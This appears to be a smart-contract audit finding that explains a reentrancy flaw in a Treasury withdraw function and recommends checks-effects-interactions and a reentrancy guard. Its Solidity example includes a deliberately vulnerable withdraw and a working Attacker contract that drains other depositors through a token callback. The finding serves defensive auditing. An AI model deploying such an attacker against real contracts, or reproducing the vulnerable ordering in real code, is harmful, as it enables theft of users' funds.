The withdraw function in the Treasury contract is vulnerable to a reentrancy attack. The function transfers the tokens to the caller first and only afterwards records the withdrawal: the caller's balance is reduced and the Withdrawn event is emitted after the external transfer returns. If the recipient is a contract and the transfer hands it control (a token with a receiver hook, or a native-ETH send), the attacker can call withdraw again, or call into any other contract of the protocol that reads the Treasury's balances, while the state still shows the pre-withdrawal balance. A nonReentrant modifier on withdraw alone does not close this: it only blocks re-entry into the guarded functions of that same contract, not calls into other protocol contracts that consume the stale state. This can lead to multiple withdrawals and loss of funds. The function should update the state and emit the event before transferring the tokens.
Loss of Funds: An attacker can exploit the reentrancy to withdraw more than they are entitled to, draining funds belonging to other depositors.
Security Vulnerability: Any contract of the protocol that reads the Treasury's balances during the callback acts on stale state, compromising the integrity of the protocol's accounting.
Manual review
Reentrancy Guard: Apply OpenZeppelin's ReentrancyGuard (the nonReentrant modifier) to withdraw and to the other state-changing functions of the Treasury. Note that the guard is per contract, not protocol-wide, so it is a defence in depth rather than the primary fix.
State Update Before Transfer: Follow checks-effects-interactions: reduce the caller's balance and emit Withdrawn before the token transfer, so the withdrawal is recorded before any external call is made and a reentrant caller, in this or any other contract, sees the updated balance.
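The two withdraw shapes above side by side, as an added Solidity example that is not the audited Treasury code. Only the names Treasury, withdraw and Withdrawn come from the finding; the HookToken, the balances mapping, the withdraw-all semantics, the deposit function and the Attacker contract are assumptions made for illustration. The example uses the OpenZeppelin v5 import path for ReentrancyGuard.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the audited code: Treasury, withdraw and Withdrawn are
// the finding's names; everything else (token, balances, attacker) is assumed.
import {ReentrancyGuard} from "@openzeppelin/contracts/utils/ReentrancyGuard.sol";

// The reentry needs a transfer that hands control to the recipient: a token
// with a receiver hook (ERC777 / ERC1363 style) as modelled here, or native
// ETH sent with call(). A plain ERC20 transfer never calls the recipient.
interface ITokenReceiver {
    function onTokenReceived(address from, uint256 amount) external;
}

contract HookToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    constructor(address holder, uint256 supply) { balanceOf[holder] = supply; }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        return true;
    }

    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        allowance[from][msg.sender] -= amount; // 0.8 checked math reverts on shortfall
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        if (to.code.length > 0) {
            ITokenReceiver(to).onTokenReceived(msg.sender, amount); // control leaves the token here
        }
        return true;
    }
}

abstract contract TreasuryBase {
    HookToken public immutable token;
    mapping(address => uint256) public balances;

    event Withdrawn(address indexed account, uint256 amount);

    constructor(HookToken _token) { token = _token; }

    function deposit(uint256 amount) external {
        token.transferFrom(msg.sender, address(this), amount);
        balances[msg.sender] += amount;
    }

    function withdraw() external virtual;
}

// Vulnerable shape from the finding: interaction first, effects and event
// afterwards. While transfer() runs, the caller's balance is still unreduced.
contract TreasuryVulnerable is TreasuryBase {
    constructor(HookToken _token) TreasuryBase(_token) {}

    function withdraw() external override {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        token.transfer(msg.sender, amount);     // attacker's hook runs here
        balances[msg.sender] = 0;               // effect recorded too late
        emit Withdrawn(msg.sender, amount);
    }
}

// Hardened shape: checks-effects-interactions plus OpenZeppelin's guard.
contract TreasuryFixed is TreasuryBase, ReentrancyGuard {
    constructor(HookToken _token) TreasuryBase(_token) {}

    function withdraw() external override nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;               // effect first
        emit Withdrawn(msg.sender, amount);     // state is final before any external call
        token.transfer(msg.sender, amount);     // interaction last; a reentrant call sees 0
    }
}

// Attacker: deposits once, then re-enters from the token hook until the
// Treasury can no longer pay a full round (draining other depositors' funds).
contract Attacker is ITokenReceiver {
    TreasuryVulnerable immutable treasury;
    HookToken immutable token;

    constructor(TreasuryVulnerable _treasury, HookToken _token) {
        treasury = _treasury;
        token = _token;
    }

    function attack(uint256 amount) external {
        token.approve(address(treasury), amount);
        treasury.deposit(amount);
        treasury.withdraw();
    }

    function onTokenReceived(address, uint256 amount) external override {
        // balances[this] still equals the deposit during the callback
        if (msg.sender == address(token) && token.balanceOf(address(treasury)) >= amount) {
            treasury.withdraw();
        }
    }
}
```

Against TreasuryVulnerable, every nested withdraw reads the same unreduced balance and pays out again; the `balances[msg.sender] = 0` writes only land on the way back out. Against TreasuryFixed the nonReentrant modifier reverts the nested call, but the important property is the zeroed balance before the transfer: any other protocol contract that reads `balances` from inside the callback already sees the post-withdrawal value, which a per-contract guard alone would not provide.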